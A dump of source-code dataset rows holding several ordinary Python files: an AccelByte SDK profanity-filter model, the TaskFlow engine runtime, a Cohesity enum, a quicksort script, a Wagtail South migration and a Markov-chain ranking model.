hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
50cc25774ad7c70f901cc5d533d155db49ae90d8 | 4,590 | py | Python | accelbyte_py_sdk/api/lobby/models/models_profanity_filter.py | encyphered/accelbyte-python-sdk | 09c1e989d7251de308150fdcd3119d662ca2d205 | [
"MIT"
] | null | null | null | accelbyte_py_sdk/api/lobby/models/models_profanity_filter.py | encyphered/accelbyte-python-sdk | 09c1e989d7251de308150fdcd3119d662ca2d205 | [
"MIT"
] | null | null | null | accelbyte_py_sdk/api/lobby/models/models_profanity_filter.py | encyphered/accelbyte-python-sdk | 09c1e989d7251de308150fdcd3119d662ca2d205 | [
"MIT"
] | null | null | null | # Auto-generated at 2021-09-27T17:12:33.496089+08:00
# from: Justice Lobby Service (1.33.0)
# Copyright (c) 2018 - 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
from __future__ import annotations
from typing import Any, Dict, List, Optional, Tuple, Union
from ....core import Model
class ModelsProfanityFilter(Model):
"""Models profanity filter
Properties:
filter_: (filter) REQUIRED str
list_name: (listName) REQUIRED str
namespace: (namespace) REQUIRED str
note: (note) REQUIRED str
"""
# region fields
filter_: str # REQUIRED
list_name: str # REQUIRED
namespace: str # REQUIRED
note: str # REQUIRED
# endregion fields
# region with_x methods
def with_filter(self, value: str) -> ModelsProfanityFilter:
self.filter_ = value
return self
def with_list_name(self, value: str) -> ModelsProfanityFilter:
self.list_name = value
return self
def with_namespace(self, value: str) -> ModelsProfanityFilter:
self.namespace = value
return self
def with_note(self, value: str) -> ModelsProfanityFilter:
self.note = value
return self
# endregion with_x methods
# region to methods
def to_dict(self, include_empty: bool = False) -> dict:
result = {}
if hasattr(self, "filter_") and self.filter_:
result["filter"] = str(self.filter_)
elif include_empty:
result["filter"] = str()
if hasattr(self, "list_name") and self.list_name:
result["listName"] = str(self.list_name)
elif include_empty:
result["listName"] = str()
if hasattr(self, "namespace") and self.namespace:
result["namespace"] = str(self.namespace)
elif include_empty:
result["namespace"] = str()
if hasattr(self, "note") and self.note:
result["note"] = str(self.note)
elif include_empty:
result["note"] = str()
return result
# endregion to methods
# region static methods
@classmethod
def create(
cls,
filter_: str,
list_name: str,
namespace: str,
note: str,
) -> ModelsProfanityFilter:
instance = cls()
instance.filter_ = filter_
instance.list_name = list_name
instance.namespace = namespace
instance.note = note
return instance
@classmethod
def create_from_dict(cls, dict_: dict, include_empty: bool = False) -> ModelsProfanityFilter:
instance = cls()
if not dict_:
return instance
if "filter" in dict_ and dict_["filter"] is not None:
instance.filter_ = str(dict_["filter"])
elif include_empty:
instance.filter_ = str()
if "listName" in dict_ and dict_["listName"] is not None:
instance.list_name = str(dict_["listName"])
elif include_empty:
instance.list_name = str()
if "namespace" in dict_ and dict_["namespace"] is not None:
instance.namespace = str(dict_["namespace"])
elif include_empty:
instance.namespace = str()
if "note" in dict_ and dict_["note"] is not None:
instance.note = str(dict_["note"])
elif include_empty:
instance.note = str()
return instance
@staticmethod
def get_field_info() -> Dict[str, str]:
return {
"filter": "filter_",
"listName": "list_name",
"namespace": "namespace",
"note": "note",
}
# endregion static methods
| 31.875 | 109 | 0.580392 |
32ce052a3bc7516bd159f910902f2c10a17cf901 | 13,858 | py | Python | taskflow/engines/action_engine/runtime.py | mail2nsrajesh/taskflow | 306087839cdb616f6fde94d8748acd01e64d1a3c | [
"Apache-2.0"
] | null | null | null | taskflow/engines/action_engine/runtime.py | mail2nsrajesh/taskflow | 306087839cdb616f6fde94d8748acd01e64d1a3c | [
"Apache-2.0"
] | 1 | 2018-10-19T18:58:38.000Z | 2018-10-19T18:58:38.000Z | taskflow/engines/action_engine/runtime.py | jimbobhickville/taskflow | 6ea991ce94f5be46b7e4726b4c4f014e10407786 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (C) 2014 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import functools
from futurist import waiters
from taskflow import deciders as de
from taskflow.engines.action_engine.actions import retry as ra
from taskflow.engines.action_engine.actions import task as ta
from taskflow.engines.action_engine import builder as bu
from taskflow.engines.action_engine import compiler as com
from taskflow.engines.action_engine import completer as co
from taskflow.engines.action_engine import scheduler as sched
from taskflow.engines.action_engine import scopes as sc
from taskflow.engines.action_engine import selector as se
from taskflow.engines.action_engine import traversal as tr
from taskflow import exceptions as exc
from taskflow import logging
from taskflow import states as st
from taskflow.utils import misc
from taskflow.flow import (LINK_DECIDER, LINK_DECIDER_DEPTH) # noqa
# Small helper to make the edge decider tuples more easily useable...
_EdgeDecider = collections.namedtuple('_EdgeDecider',
'from_node,kind,decider,depth')
LOG = logging.getLogger(__name__)
class Runtime(object):
"""A aggregate of runtime objects, properties, ... used during execution.
This object contains various utility methods and properties that represent
the collection of runtime components and functionality needed for an
action engine to run to completion.
"""
def __init__(self, compilation, storage, atom_notifier,
task_executor, retry_executor,
options=None):
self._atom_notifier = atom_notifier
self._task_executor = task_executor
self._retry_executor = retry_executor
self._storage = storage
self._compilation = compilation
self._atom_cache = {}
self._options = misc.safe_copy_dict(options)
def _walk_edge_deciders(self, graph, atom):
"""Iterates through all nodes, deciders that alter atoms execution."""
# This is basically a reverse breadth first exploration, with
# special logic to further traverse down flow nodes as needed...
predecessors_iter = graph.predecessors_iter
nodes = collections.deque((u_node, atom)
for u_node in predecessors_iter(atom))
visited = set()
while nodes:
u_node, v_node = nodes.popleft()
u_node_kind = graph.node[u_node]['kind']
u_v_data = graph.adj[u_node][v_node]
try:
decider = u_v_data[LINK_DECIDER]
decider_depth = u_v_data.get(LINK_DECIDER_DEPTH)
if decider_depth is None:
decider_depth = de.Depth.ALL
yield _EdgeDecider(u_node, u_node_kind,
decider, decider_depth)
except KeyError:
pass
if u_node_kind == com.FLOW and u_node not in visited:
# Avoid re-exploring the same flow if we get to this same
# flow by a different *future* path...
visited.add(u_node)
# Since we *currently* jump over flow node(s), we need to make
# sure that any prior decider that was directed at this flow
# node also gets used during future decisions about this
# atom node.
nodes.extend((u_u_node, u_node)
for u_u_node in predecessors_iter(u_node))
def compile(self):
"""Compiles & caches frequently used execution helper objects.
Build out a cache of commonly used item that are associated
with the contained atoms (by name), and are useful to have for
quick lookup on (for example, the change state handler function for
each atom, the scope walker object for each atom, the task or retry
specific scheduler and so-on).
"""
change_state_handlers = {
com.TASK: functools.partial(self.task_action.change_state,
progress=0.0),
com.RETRY: self.retry_action.change_state,
}
schedulers = {
com.RETRY: self.retry_scheduler,
com.TASK: self.task_scheduler,
}
check_transition_handlers = {
com.TASK: st.check_task_transition,
com.RETRY: st.check_retry_transition,
}
actions = {
com.TASK: self.task_action,
com.RETRY: self.retry_action,
}
graph = self._compilation.execution_graph
for node, node_data in graph.nodes_iter(data=True):
node_kind = node_data['kind']
if node_kind in com.FLOWS:
continue
elif node_kind in com.ATOMS:
check_transition_handler = check_transition_handlers[node_kind]
change_state_handler = change_state_handlers[node_kind]
scheduler = schedulers[node_kind]
action = actions[node_kind]
else:
raise exc.CompilationFailure("Unknown node kind '%s'"
" encountered" % node_kind)
metadata = {}
deciders_it = self._walk_edge_deciders(graph, node)
walker = sc.ScopeWalker(self.compilation, node, names_only=True)
metadata['scope_walker'] = walker
metadata['check_transition_handler'] = check_transition_handler
metadata['change_state_handler'] = change_state_handler
metadata['scheduler'] = scheduler
metadata['edge_deciders'] = tuple(deciders_it)
metadata['action'] = action
LOG.trace("Compiled %s metadata for node %s (%s)",
metadata, node.name, node_kind)
self._atom_cache[node.name] = metadata
# TODO(harlowja): optimize the different decider depths to avoid
# repeated full successor searching; this can be done by searching
# for the widest depth of parent(s), and limiting the search of
# children by the that depth.
@property
def compilation(self):
return self._compilation
@property
def storage(self):
return self._storage
@property
def options(self):
return self._options
@misc.cachedproperty
def selector(self):
return se.Selector(self)
@misc.cachedproperty
def builder(self):
return bu.MachineBuilder(self, waiters.wait_for_any)
@misc.cachedproperty
def completer(self):
return co.Completer(self)
@misc.cachedproperty
def scheduler(self):
return sched.Scheduler(self)
@misc.cachedproperty
def task_scheduler(self):
return sched.TaskScheduler(self)
@misc.cachedproperty
def retry_scheduler(self):
return sched.RetryScheduler(self)
@misc.cachedproperty
def retry_action(self):
return ra.RetryAction(self._storage,
self._atom_notifier,
self._retry_executor)
@misc.cachedproperty
def task_action(self):
return ta.TaskAction(self._storage,
self._atom_notifier,
self._task_executor)
def _fetch_atom_metadata_entry(self, atom_name, metadata_key):
return self._atom_cache[atom_name][metadata_key]
def check_atom_transition(self, atom, current_state, target_state):
"""Checks if the atom can transition to the provided target state."""
# This does not check if the name exists (since this is only used
# internally to the engine, and is not exposed to atoms that will
# not exist and therefore doesn't need to handle that case).
check_transition_handler = self._fetch_atom_metadata_entry(
atom.name, 'check_transition_handler')
return check_transition_handler(current_state, target_state)
def fetch_edge_deciders(self, atom):
"""Fetches the edge deciders for the given atom."""
# This does not check if the name exists (since this is only used
# internally to the engine, and is not exposed to atoms that will
# not exist and therefore doesn't need to handle that case).
return self._fetch_atom_metadata_entry(atom.name, 'edge_deciders')
def fetch_scheduler(self, atom):
"""Fetches the cached specific scheduler for the given atom."""
# This does not check if the name exists (since this is only used
# internally to the engine, and is not exposed to atoms that will
# not exist and therefore doesn't need to handle that case).
return self._fetch_atom_metadata_entry(atom.name, 'scheduler')
def fetch_action(self, atom):
"""Fetches the cached action handler for the given atom."""
metadata = self._atom_cache[atom.name]
return metadata['action']
def fetch_scopes_for(self, atom_name):
"""Fetches a walker of the visible scopes for the given atom."""
try:
return self._fetch_atom_metadata_entry(atom_name, 'scope_walker')
except KeyError:
# This signals to the caller that there is no walker for whatever
# atom name was given that doesn't really have any associated atom
# known to be named with that name; this is done since the storage
# layer will call into this layer to fetch a scope for a named
# atom and users can provide random names that do not actually
# exist...
return None
# Various helper methods used by the runtime components; not for public
# consumption...
def iterate_retries(self, state=None):
"""Iterates retry atoms that match the provided state.
If no state is provided it will yield back all retry atoms.
"""
if state:
atoms = list(self.iterate_nodes((com.RETRY,)))
atom_states = self._storage.get_atoms_states(atom.name
for atom in atoms)
for atom in atoms:
atom_state, _atom_intention = atom_states[atom.name]
if atom_state == state:
yield atom
else:
for atom in self.iterate_nodes((com.RETRY,)):
yield atom
def iterate_nodes(self, allowed_kinds):
"""Yields back all nodes of specified kinds in the execution graph."""
graph = self._compilation.execution_graph
for node, node_data in graph.nodes_iter(data=True):
if node_data['kind'] in allowed_kinds:
yield node
def is_success(self):
"""Checks if all atoms in the execution graph are in 'happy' state."""
atoms = list(self.iterate_nodes(com.ATOMS))
atom_states = self._storage.get_atoms_states(atom.name
for atom in atoms)
for atom in atoms:
atom_state, _atom_intention = atom_states[atom.name]
if atom_state == st.IGNORE:
continue
if atom_state != st.SUCCESS:
return False
return True
def find_retry(self, node):
"""Returns the retry atom associated to the given node (or none)."""
graph = self._compilation.execution_graph
return graph.node[node].get(com.RETRY)
def reset_atoms(self, atoms, state=st.PENDING, intention=st.EXECUTE):
"""Resets all the provided atoms to the given state and intention."""
tweaked = []
for atom in atoms:
if state or intention:
tweaked.append((atom, state, intention))
if state:
change_state_handler = self._fetch_atom_metadata_entry(
atom.name, 'change_state_handler')
change_state_handler(atom, state)
if intention:
self.storage.set_atom_intention(atom.name, intention)
return tweaked
def reset_all(self, state=st.PENDING, intention=st.EXECUTE):
"""Resets all atoms to the given state and intention."""
return self.reset_atoms(self.iterate_nodes(com.ATOMS),
state=state, intention=intention)
def reset_subgraph(self, atom, state=st.PENDING, intention=st.EXECUTE):
"""Resets a atoms subgraph to the given state and intention.
The subgraph is contained of **all** of the atoms successors.
"""
execution_graph = self._compilation.execution_graph
atoms_it = tr.depth_first_iterate(execution_graph, atom,
tr.Direction.FORWARD)
return self.reset_atoms(atoms_it, state=state, intention=intention)
def retry_subflow(self, retry):
"""Prepares a retrys + its subgraph for execution.
This sets the retrys intention to ``EXECUTE`` and resets all of its
subgraph (its successors) to the ``PENDING`` state with an ``EXECUTE``
intention.
"""
tweaked = self.reset_atoms([retry], state=None, intention=st.EXECUTE)
tweaked.extend(self.reset_subgraph(retry))
return tweaked
| 42.121581 | 79 | 0.634002 |
0cc31fd65e25fb78c6cd247c545d6a4cf3178582 | 782 | py | Python | cohesity_management_sdk/models/object_class_added_active_directory_principal_enum.py | chandrashekar-cohesity/management-sdk-python | 9e6ec99e8a288005804b808c4e9b19fd204e3a8b | [
"Apache-2.0"
] | 1 | 2019-11-07T23:19:32.000Z | 2019-11-07T23:19:32.000Z | cohesity_management_sdk/models/object_class_added_active_directory_principal_enum.py | chandrashekar-cohesity/management-sdk-python | 9e6ec99e8a288005804b808c4e9b19fd204e3a8b | [
"Apache-2.0"
] | null | null | null | cohesity_management_sdk/models/object_class_added_active_directory_principal_enum.py | chandrashekar-cohesity/management-sdk-python | 9e6ec99e8a288005804b808c4e9b19fd204e3a8b | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2019 Cohesity Inc.
class ObjectClassAddedActiveDirectoryPrincipalEnum(object):
"""Implementation of the 'ObjectClass_AddedActiveDirectoryPrincipal' enum.
Specifies the type of the referenced Active Directory principal.
If 'kGroup', the referenced Active Directory principal is a group.
If 'kUser', the referenced Active Directory principal is a user.
'kUser' specifies a user object class.
'kGroup' specifies a group object class.
'kComputer' specifies a computer object class.
Attributes:
KUSER: TODO: type description here.
KGROUP: TODO: type description here.
KCOMPUTER: TODO: type description here.
"""
KUSER = 'kUser'
KGROUP = 'kGroup'
KCOMPUTER = 'kComputer'
| 27.928571 | 78 | 0.704604 |
bd1aed3e21a7354d1e6d0e20be5c345e504e2636 | 638 | py | Python | 01-algorithm-design-and-techniques/4_divide_and_conquer/sorting.py | hamidgasmi/training.computerscience.algorithms-datastructures | bd156dd2e9ed5681d9f1e4a23f71a92d68d0db43 | [
"MIT"
] | 8 | 2020-11-15T13:55:27.000Z | 2022-03-15T00:30:10.000Z | 01-algorithm-design-and-techniques/4_divide_and_conquer/sorting.py | hamidgasmi/training.computerscience.algorithms-datastructures | bd156dd2e9ed5681d9f1e4a23f71a92d68d0db43 | [
"MIT"
] | 217 | 2020-02-28T03:09:05.000Z | 2020-10-29T13:19:12.000Z | 01-algorithm-design-and-techniques/4_divide_and_conquer/sorting.py | hamidgasmi/training.computerscience.algorithms-datastructures | bd156dd2e9ed5681d9f1e4a23f71a92d68d0db43 | [
"MIT"
] | 3 | 2021-07-04T06:42:14.000Z | 2021-11-20T17:56:48.000Z | import sys
import random
def partition2(a, l, r):
x = a[l]
j = l
for i in range(l + 1, r + 1):
if a[i] <= x:
j += 1
a[i], a[j] = a[j], a[i]
a[l], a[j] = a[j], a[l]
return j
def randomized_quick_sort(a, l, r):
if l >= r:
return
k = random.randint(l, r)
a[l], a[k] = a[k], a[l]
m = partition2(a, l, r)
randomized_quick_sort(a, l, m - 1)
randomized_quick_sort(a, m + 1, r)
if __name__ == '__main__':
input = sys.stdin.read()
n, *a = list(map(int, input.split()))
randomized_quick_sort(a, 0, n - 1)
for x in a:
print(x, end=' ')
| 20.580645 | 41 | 0.485893 |
31af299fc92936ff339b680f2b2c07c1715f53a5 | 11,147 | py | Python | wagtail/wagtailcore/south_migrations/0001_initial.py | willcodefortea/wagtail | 2723b85ed8f356bde89d9541105b8cea4812d6a1 | [
"BSD-3-Clause"
] | null | null | null | wagtail/wagtailcore/south_migrations/0001_initial.py | willcodefortea/wagtail | 2723b85ed8f356bde89d9541105b8cea4812d6a1 | [
"BSD-3-Clause"
] | null | null | null | wagtail/wagtailcore/south_migrations/0001_initial.py | willcodefortea/wagtail | 2723b85ed8f356bde89d9541105b8cea4812d6a1 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
from wagtail.wagtailcore.compat import AUTH_USER_MODEL, AUTH_USER_MODEL_NAME
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Site'
db.create_table('wagtailcore_site', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('hostname', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255, db_index=True)),
('port', self.gf('django.db.models.fields.IntegerField')(default=80)),
('root_page', self.gf('django.db.models.fields.related.ForeignKey')(related_name='sites_rooted_here', to=orm['wagtailcore.Page'])),
('is_default_site', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal('wagtailcore', ['Site'])
# Adding model 'Page'
db.create_table('wagtailcore_page', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('path', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255)),
('depth', self.gf('django.db.models.fields.PositiveIntegerField')()),
('numchild', self.gf('django.db.models.fields.PositiveIntegerField')(default=0)),
('title', self.gf('django.db.models.fields.CharField')(max_length=255)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=50)),
('content_type', self.gf('django.db.models.fields.related.ForeignKey')(related_name='pages', to=orm['contenttypes.ContentType'])),
('live', self.gf('django.db.models.fields.BooleanField')(default=True)),
('has_unpublished_changes', self.gf('django.db.models.fields.BooleanField')(default=False)),
('url_path', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('owner', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='owned_pages', null=True, to=orm[AUTH_USER_MODEL])),
('seo_title', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('show_in_menus', self.gf('django.db.models.fields.BooleanField')(default=False)),
('search_description', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal('wagtailcore', ['Page'])
# Adding model 'PageRevision'
db.create_table('wagtailcore_pagerevision', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('page', self.gf('django.db.models.fields.related.ForeignKey')(related_name='revisions', to=orm['wagtailcore.Page'])),
('submitted_for_moderation', self.gf('django.db.models.fields.BooleanField')(default=False)),
('created_at', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm[AUTH_USER_MODEL], null=True, blank=True)),
('content_json', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal('wagtailcore', ['PageRevision'])
# Adding model 'GroupPagePermission'
db.create_table('wagtailcore_grouppagepermission', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('group', self.gf('django.db.models.fields.related.ForeignKey')(related_name='page_permissions', to=orm['auth.Group'])),
('page', self.gf('django.db.models.fields.related.ForeignKey')(related_name='group_permissions', to=orm['wagtailcore.Page'])),
('permission_type', self.gf('django.db.models.fields.CharField')(max_length=20)),
))
db.send_create_signal('wagtailcore', ['GroupPagePermission'])
def backwards(self, orm):
# Deleting model 'Site'
db.delete_table('wagtailcore_site')
# Deleting model 'Page'
db.delete_table('wagtailcore_page')
# Deleting model 'PageRevision'
db.delete_table('wagtailcore_pagerevision')
# Deleting model 'GroupPagePermission'
db.delete_table('wagtailcore_grouppagepermission')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
AUTH_USER_MODEL: {
'Meta': {'object_name': AUTH_USER_MODEL_NAME},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'user_set'", 'blank': 'True', 'to': "orm['auth.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'user_set'", 'blank': 'True', 'to': "orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'wagtailcore.grouppagepermission': {
'Meta': {'object_name': 'GroupPagePermission'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'page_permissions'", 'to': "orm['auth.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'group_permissions'", 'to': "orm['wagtailcore.Page']"}),
'permission_type': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
'wagtailcore.page': {
'Meta': {'object_name': 'Page'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pages'", 'to': "orm['contenttypes.ContentType']"}),
'depth': ('django.db.models.fields.PositiveIntegerField', [], {}),
'has_unpublished_changes': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'live': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'numchild': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'owned_pages'", 'null': 'True', 'to': "orm['%s']" % AUTH_USER_MODEL}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'search_description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'seo_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'show_in_menus': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'url_path': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
},
'wagtailcore.pagerevision': {
'Meta': {'object_name': 'PageRevision'},
'content_json': ('django.db.models.fields.TextField', [], {}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'revisions'", 'to': "orm['wagtailcore.Page']"}),
'submitted_for_moderation': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % AUTH_USER_MODEL, 'null': 'True', 'blank': 'True'})
},
'wagtailcore.site': {
'Meta': {'object_name': 'Site'},
'hostname': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_default_site': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'port': ('django.db.models.fields.IntegerField', [], {'default': '80'}),
'root_page': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sites_rooted_here'", 'to': "orm['wagtailcore.Page']"})
}
}
complete_apps = ['wagtailcore'] | 70.106918 | 193 | 0.60366 |
d06a5181661f5f73feeb7820ddebac2f55560f7e | 3,491 | py | Python | src/models/markov_chain.py | dballesteros7/master-thesis-2015 | 8c0bf9a6eef172fc8167a30780ae0666f8ea2d88 | [
"MIT"
] | null | null | null | src/models/markov_chain.py | dballesteros7/master-thesis-2015 | 8c0bf9a6eef172fc8167a30780ae0666f8ea2d88 | [
"MIT"
] | null | null | null | src/models/markov_chain.py | dballesteros7/master-thesis-2015 | 8c0bf9a6eef172fc8167a30780ae0666f8ea2d88 | [
"MIT"
] | null | null | null | import itertools
import numpy as np
import constants
from utils import file
class MarkovChain:
def __init__(self, n_items: int, pseudo_count: int = 1,
use_rejection: bool = True):
self.n_items = n_items
self.counts = np.empty(n_items)
self.first_order_counts = np.empty((n_items, n_items))
self.counts.fill((n_items - 1) * pseudo_count)
self.first_order_counts.fill(pseudo_count)
self.use_rejection = use_rejection
np.fill_diagonal(self.first_order_counts, 0) # No self loops.
def train(self, ordered_sets: np.ndarray):
for ordered_set in ordered_sets:
for item, next_item in itertools.zip_longest(
ordered_set, ordered_set[1:]):
if next_item is not None:
self.counts[item] += 1
self.first_order_counts[item][next_item] += 1
def propose_set_item(self, to_complete):
missing_pos = to_complete.index('?')
probs = np.zeros_like(self.first_order_counts)
for idx, row in enumerate(self.first_order_counts):
probs[idx, :] = self.first_order_counts[idx, :] / self.counts[idx]
if missing_pos == 0:
column = probs[:, int(to_complete[missing_pos + 1])]
row = np.ones_like(column)
elif missing_pos == len(to_complete) - 1:
row = probs[:, int(to_complete[missing_pos - 1])]
column = np.ones_like(row)
else:
column = probs[:, int(to_complete[missing_pos + 1])]
row = probs[:, int(to_complete[missing_pos - 1])]
likelihood = column*row
to_complete = [int(x) for x in to_complete if x != '?']
if self.use_rejection:
likelihood[to_complete] = 0.0
sorted_indexes = np.argsort(likelihood)
return sorted_indexes[::-1]
def train_and_evaluate(dataset_name: str, n_items: int):
for fold in range(1, constants.N_FOLDS + 1):
for use_rejection in (False, True):
model = MarkovChain(n_items, use_rejection=use_rejection)
loaded_data = file.load_set_data(
constants.TRAIN_DATA_PATH_TPL.format(
fold=fold, dataset=dataset_name))
model.train(loaded_data)
loaded_test_data = file.load_csv_test_data(
constants.PARTIAL_DATA_PATH_TPL.format(
fold=fold, dataset=dataset_name))
model_name = 'pseudo_markov' if use_rejection else 'markov'
target_path = constants.RANKING_MODEL_PATH_TPL.format(
dataset=dataset_name, fold=fold, model=model_name)
with open(target_path, 'w') as output_file:
for subset in loaded_test_data:
model.propose_set_item(subset)
result = model.propose_set_item(subset)
# if subset.index('?') > 0:
# short_subset = subset[:subset.index('?')]
# short_subset = [int(item) for item in short_subset]
#
output_file.write(','.join(str(item) for item in result))
output_file.write('\n')
# else:
# output_file.write('-\n')
if __name__ == '__main__':
train_and_evaluate(constants.DATASET_NAME_TPL.format('100_no_singles'), 100)
#train_and_evaluate(constants.DATASET_NAME_TPL.format('50_no_singles'), 50)
| 42.573171 | 80 | 0.593813 |
35ea3f9ea341c6518130c325a5265217fc73e6c6 | 1,645 | py | Python | juq/serializer/builder.py | inhzus/juq | 2721f1361eed3d4e7da36d67f924942faef24650 | [
"MIT"
